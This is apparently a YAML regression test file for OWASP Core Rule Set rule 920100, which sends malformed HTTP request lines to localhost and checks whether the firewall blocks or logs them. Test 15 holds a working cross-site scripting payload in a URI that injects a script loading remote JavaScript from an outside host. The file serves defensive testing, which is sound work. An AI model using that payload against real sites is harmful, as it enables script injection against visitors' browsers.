---
meta:
  author: "csanders-git, azurit"
  description: "Tests to trigger, or not trigger 920100"
rule_id: 920100
tests:
  - test_id: 1
    desc: Standard GET request
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920100]
  - test_id: 2
    desc: |
      Request has tab (\t) before request method - Apache complains
      AH00126: Invalid URI in request      GET / HTTP/1.1
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "     GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get"
          version: "HTTP/1.1"
        output:
          status: 400
  - test_id: 3
    desc: Perfectly valid OPTIONS request
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "OPTIONS"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "*"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920100]
  - test_id: 4
    desc: Valid CONNECT
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "CONNECT"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "1.2.3.4:80"
          version: "HTTP/1.1"
        output:
          status: 200
          log:
            no_expect_ids: [920100]
  - test_id: 5
    desc: invalid Connect request, domains require ports
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "CONNECT"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "www.coreruleset.org"
          version: "HTTP/1.1"
        output:
          status: 400
  - test_id: 6
    desc: This is an acceptable CONNECT request for SSL tunneling
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "CONNECT"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "www.coreruleset.org:80"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920100]
  - test_id: 7
    desc: Valid request with query and anchor components
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get/index.html?I=Like&Apples=Today#tag"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920100]
  - test_id: 8
    desc: |
      The colon in the path is not allowed. Apache will block by default:
      (20024)The given path is misformatted or contained invalid characters: [client 127.0.0.1:4142] AH00127: Cannot map GET /index.html:80?I=Like&Apples=Today#tag HTTP/1.1 to file
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/get/index.html:80?I=Like&Apples=Today#tag"
          version: "HTTP/1.1"
        output:
          status: 400
  - test_id: 9
    desc: Normal Options request with path
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "OPTIONS"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/"
          version: "HTTP/1.1"
        output:
          log:
            no_expect_ids: [920100]
  - test_id: 10
    desc: An invalid method with a long name
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "REALLYLONGUNREALMETHOD"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "/"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [920100]
  - test_id: 11
    desc: |
      An invalid request because a backslash is used in URI.
      Apache will end up blocking this before it gets to CRS.
      We will need to support OR output tests to fix this.
    stages:
      - input:
          dest_addr: "127.0.0.1"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "\\"
          version: "HTTP/1.1"
        output:
          status: 400
  - test_id: 12
    desc: Invalid HTTP Request Line (920100) - Test 1 from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            User-Agent: "OWASP CRS test agent"
          method: "\tGET"
          port: 80
          uri: "/get"
          version: HTTP/1.1
        output:
          status: 400
  - test_id: 13
    desc: Invalid HTTP Request Line (920100) - Test 2 from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            User-Agent: "OWASP CRS test agent"
          method: GET
          port: 80
          uri: \index.html
          version: HTTP\1.0
        output:
          status: 400
  - test_id: 14
    desc: Invalid HTTP Request Line (920100) - Test 3 from old modsec regressions
    stages:
      - input:
          dest_addr: 127.0.0.1
          headers:
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
            Host: localhost
            Keep-Alive: '300'
            Proxy-Connection: keep-alive
            User-Agent: "OWASP CRS test agent"
          method: '|GET'
          port: 80
          uri: "/get"
          version: HTTP/1.1
        output:
          log:
            expect_ids: [920100]
  - test_id: 15
    desc: Test as described in http://www.client9.com/article/five-interesting-injection-attacks/
    stages:
      - input:
          dest_addr: 127.0.0.1
          method: GET
          port: 80
          uri: '/get/demo/xss/xml/vuln.xml.php?input=<script xmlns="http://www.w3.org/1999/xhtml">setTimeout("top.frame2.location=\"javascript:(function () {var x = document.createElement(\\\"script\\\");x.src = \\\"//sdl.me/popup.js?//\\\";document.childNodes\[0\].appendChild(x);}());\"",1000)</script>&//'
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: localhost
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          version: "HTTP/1.1"
        output:
          status: 400
  - test_id: 16
    desc: "Status Page Test - Invalid HTTP request line: URI has scheme and authority but no path"
    stages:
      - input:
          dest_addr: "127.0.0.1"
          method: "GET"
          port: 80
          headers:
            User-Agent: "OWASP CRS test agent"
            Host: "localhost"
            Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
          uri: "http://localhost"
          version: "HTTP/1.1"
        output:
          log:
            expect_ids: [920100]
